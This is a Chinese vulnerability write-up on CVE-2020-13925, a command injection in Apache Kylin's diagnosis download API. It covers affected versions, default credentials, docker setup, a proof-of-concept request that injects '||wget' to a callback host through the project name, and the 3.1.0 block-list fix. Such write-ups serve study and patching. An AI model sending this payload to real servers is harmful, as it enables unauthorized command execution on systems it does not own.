CVE-2020-13925 Apache Kylin命令注入漏洞

CVE-2020-13925 Apache Kylin命令注入漏洞

漏洞简介

简要说明

Apache Kylin 是一个大数据的平台

影响版本

  • 2.3.0, 2.3.1, 2.3.2,
  • 2.4.0, 2.4.1,
  • 2.5.0, 2.5.1, 2.5.2,
  • 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6,
  • 3.0.0-alpha, 3.0.0-alpha2,3.0.0-beta, 3.0.0, 3.0.1 3.0.2

Users of all previous versions after 2.3 should upgrade to 3.1.0.  即修复版本: 3.1.0

漏洞利用条件

  • 需要有账号能够登陆 WEB 系统。初始用户名和密码是 ADMIN/KYLIN

漏洞复现

环境搭建

参考 https://github.com/apache/kylin 使用docker进行环境部署,修改其中的版本为3.0.1(存在漏洞的版本)。可以去除 【-m 8G \ 】它的作用是分配内存的大小。

然后访问 http://host:7070/kylin/login 初始用户名和密码是 ADMIN/KYLIN

docker pull apachekylin/apache-kylin-standalone:3.0.1

docker run -d \
    -m 8G \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1

docker run -d \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1

漏洞验证PoC

原始请求:
http://120.76.179.151:7070/kylin/api/diag/project/learn_kylin/download

PoC请求,GET方法:
http://host:port/kylin/api/diag/project/%7c%7cwget%20h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net%7c%7c/download

即将项目名称“learn_kylin”替换为如下payload访问即可:
||wget h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net||

复现步骤

访问 System-Configuration-Diagnosis。触发下载诊断信息的请求 http://host:port/kylin/api/diag/project/learn_kylin/download image.png 即将项目名称“learn_kylin”替换为如上payload访问即可。

image.png

漏洞分析

定位漏洞代码

https://github.com/apache/kylin/tree/kylin-3.0.2/server-base

漏洞代码位置: https://github.com/apache/kylin/blob/kylin-3.0.2/server-base/src/main/java/org/apache/kylin/rest/controller/DiagnosisController.java image.png https://github.com/apache/kylin/blob/kylin-3.0.2/server-base/src/main/java/org/apache/kylin/rest/service/DiagnosisService.java image.png https://github.com/apache/kylin/blob/kylin-3.0.2/core-common/src/main/java/org/apache/kylin/common/util/CliCommandExecutor.java image.png image.png

修复方案

对比3.0.2和3.1.0两个版本的代码: src\main\java\org\apache\kylin\rest\controller\DiagnosisController.java code-diff.png

过滤代码在kylin-kylin-3.1.0\kylin-kylin-3.1.0\core-common\src\main\java\org\apache\kylin\common\util\CliCommandExecutor.java中,采用了黑名单方式过滤。

    public static final String COMMAND_BLOCK_LIST = "[ &`>|{}()$;\\#~!+*\\\\]+";
    public static final String COMMAND_WHITE_LIST = "[^\\w%,@/:=?.\"\\[\\]]";
    public static final String HIVE_BLOCK_LIST = "[ <>()$;\\-#!+*\"'/=%@]+";


    /**
     * <pre>
     * Check parameter for preventing command injection, replace illegal character into empty character.
     *
     * Note:
     * 1. Whitespace is also refused because parameter is a single word, should not contains it
     * 2. Some character may be illegal but still be accepted because commandParameter maybe a URI/path expression,
     *     you may check "Character part" in https://docs.oracle.com/javase/8/docs/api/java/net/URI.html,
     *     here is the character which is not banned.
     *
     *     1. dot .
     *     2. slash /
     *     3. colon :
     *     4. equal =
     *     5. ?
     *     6. @
     *     7. bracket []
     *     8. comma ,
     *     9. %
     * </pre>
     */
    public static String checkParameter(String commandParameter) {
        return checkParameter(commandParameter, COMMAND_BLOCK_LIST);
    }

    public static String checkParameterWhiteList(String commandParameter) {
        return checkParameter(commandParameter, COMMAND_WHITE_LIST);
    }

    public static String checkHiveProperty(String hiveProperty) {
        return checkParameter(hiveProperty, HIVE_BLOCK_LIST);
    }

    private static String checkParameter(String commandParameter, String rex) {
        String repaired = commandParameter.replaceAll(rex, "");
        if (repaired.length() != commandParameter.length()) {
            logger.warn("Detected illegal character in command {} by {} , replace it to {}.", commandParameter, rex, repaired);
        }
        return repaired;
    }

命令注入常用的连接符 || && 都被过滤了,这里甚至过滤了空格,找不到绕过的方法。

参考链接

https://mp.weixin.qq.com/s/LdEgENX2_b8tb12n4H9KJQ